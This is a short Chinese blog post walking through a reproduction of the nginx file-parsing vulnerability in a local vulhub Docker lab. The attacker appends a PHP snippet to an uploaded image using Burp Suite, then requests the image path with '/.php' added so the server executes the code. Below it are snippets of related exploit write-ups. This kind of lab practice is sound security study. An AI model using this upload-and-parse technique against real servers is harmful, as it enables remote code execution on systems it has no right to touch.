复现vulhub nginx解析漏洞

最新推荐文章于 2024-04-06 06:43:40 发布
最新推荐文章于 2024-04-06 06:43:40 发布
阅读量448 收藏
点赞数
文章标签: nginx php linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/BBH_FCC/article/details/129578577
版权

(1)切换目录:cd vulhub-master/nginx/nginx_parsing_vulnerability。

(2)docker-compose up -d 启动。

(3)访问:http:// 192.168.68.152。

(4)上传一个图片,burpsuite抓包。

(5)send to repeater,修改数据包,在末尾添加<?php phpinfo();?>,点击go。

(6)浏览器访问:http://192.168.68.152/uploadfiles/032b2cc936860b03048302d991c3498f.jpg/.php

 

 

BBH_FCC
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
Nginx解析漏洞测试
09-19
Nginx是一款高性能的web服务器,使用非常广泛,其不仅经常被用作...默认情况下可能导致服务器错误的将任何类型的文件以PHP的方式进行解析,这将导致严重的安全问题,使得恶意的攻击者可能攻陷支持php的nginx服务器。
vulhub漏洞1
xhscxj的博客
05-23 1864
CVE-2018-18778 CVE-2018-18778是基于mini_httpd的一个任意文件读取漏洞 Mini_httpd是一个微型的Http服务器,在占用系统资源较小的情况下可以保持一定程度的性能(约为Apache的90%),因此广泛被各类IOT(路由器,交换器,摄像头等)作为嵌入式服务器。而包括华为,zyxel,海康威视,树莓派等在内的厂商的旗下设备都曾采用Mini_httpd组件。 影响版本:ACME mini_httpd before 1.30 分析 当mini_httpd开启虚拟主机时,此
(二)vulhub专栏:Shiro漏洞汇总
云舒的博客
06-03 1806
Shiro漏洞汇总
Vulhub漏洞环境搭建流程,37岁程序员被裁
最新发布
m0_60608008的博客
04-06 553
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
[ vulhub漏洞篇 ] vulhub 漏洞集合(含漏洞文章连接)
qq_51577576的博客
09-21 1万+
介绍:Vulhub是一个面向大众的开源漏洞靶场,无需docker知识,简单执行两条命令即可编译、运行一个完整的漏洞靶场镜像。 计划:这里记录了 vulhub 所有的漏洞,本专栏也会将这些漏洞全部,欢迎持续订阅 我也会不定期再中间更新文章链接 目的:以 vulhub 漏洞为路径,展示不同的渗透思路及手法,同类漏洞我会尽量用多种渗透思路进行,不仅仅是提高个人能力,也是想再 CSDN 这个平台认识更多的安全爱好者
vulhub靶场搭建及漏洞教程
热门推荐
Cwillchris的博客
03-25 1万+
准备一个纯净的ubantu系统 1、先更新一下安装列表 sudo apt-get update 2、安装docker.io sudo apt install docker.io 查看是否安装成功 docker -v 3、查看是否安装pip pip -V 检测到未安装,提示是否安装,按y下载 再次输入pip -V查看是否安装成功 4、安装docker-compose pip install docker-compose 查看是否安装成功 docker
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1447
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
服务器及nginx常见漏洞
09-14
服务器及nginx常见漏洞
Nginx相关漏洞极其预防1
08-08
Nginx相关漏洞极其预防1
nginx泛域名解析配置教程
09-30
主要介绍了nginx泛域名解析配置教程,需要的朋友可以参考下
Vunlhub靶场 Kioptrix 3
m0_57221101的博客
02-18 346
勘探 nmap探查 port 备注 22/tcp openssh 4.7p1 80/tcp apache 2.2.8 80web 主页是这样的 有一个登录界面 发这个cms有一个rce漏洞 然后目录扫描出很多东西 python3.9 dirsearch.py -u 192.168.1.104 [20:51:48] 200 - 2KB - /cache/ [
漏洞vulhub 中间件漏洞
qq_46421742的博客
08-09 310
tomcat是一个开源而且免费的jsp服务器,默认端口:8080,属于轻量级应用服务器。它可以实 JavaWeb程序的装载,是配置JSP(Java Server Page)和JAVA系统必备的一款环境。在历史上也披露出来了很多的漏洞,本文讲几个经典的漏洞过程。
vulhub-spring漏洞
qq_51922767的博客
09-14 2407
vulhub-spring漏洞
vulhub漏洞-saltstack(CVE-2020-11651、CVE-2020-11652)越权命令执行/遍历目录
遇事不决冲冲冲
10-10 4621
SaltStack 基于Python开发的一套C/S架构配置管理工具,通过部署SaltStack,可以在成千万台服务器上做到批量执行命令,根据不同业务进行配置集中化管理、分发文件、采集服务器数据、操作系统基础及软件包管理等,简单来说就是可以集中管理各种各样的服务器,但在 SaltStack < 2019.2.4,SaltStack < 3000.2版本中出了认证绕过漏洞,通过构造恶意请求,可以绕过 Salt Master 的验证逻辑,调用相关未授权函数功能,从而可以造成远程任意命令执行
vulhub漏洞77_zabbix
weixin_44193247的博客
02-14 1512
vulhub漏洞练习篇
漏洞vulhub unomi/CVE-2020-13942
qq_46421742的博客
07-03 376
进入靶场页面,使用burp进行抓包,发送到重放器模块构造数据包,更改请求方式,将get包改为post请求包,删除多余的字段,保留Host、User-Agent和Content-Length字段,然后添加以下数据(通过MVEL表达式执行任意命令),在DNSLog添加成自己的地址(DNSLog平台生成的随机域名),此处访问不到,尝试几次还是不行,查了相关资料,阅读很多文章,最终发有博主出和我一样的问题。本文属于个人笔记,仅用于学习,禁止使用于任何违法行为,任何违法行为与本人无关。重新拉取环境,成功。
vulhub靶场Webmin(CVE-2019-15107)漏洞
weixin_45095113的博客
12-12 723
Webmin(CVE-2019-15107)漏洞
vulhub漏洞70_Tomcat
weixin_44193247的博客
02-13 419
vulhub漏洞练习篇
nginx中间件解析漏洞的影响
06-10
Nginx 中间件解析漏洞是指攻击者利用 Nginx 中间件解析漏洞,通过构造恶意请求,从而绕过服务器的安全措施并执行任意代码。这种漏洞可以允许攻击者在服务器上执行任意的系统命令、读取、修改或删除服务器上的敏感...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值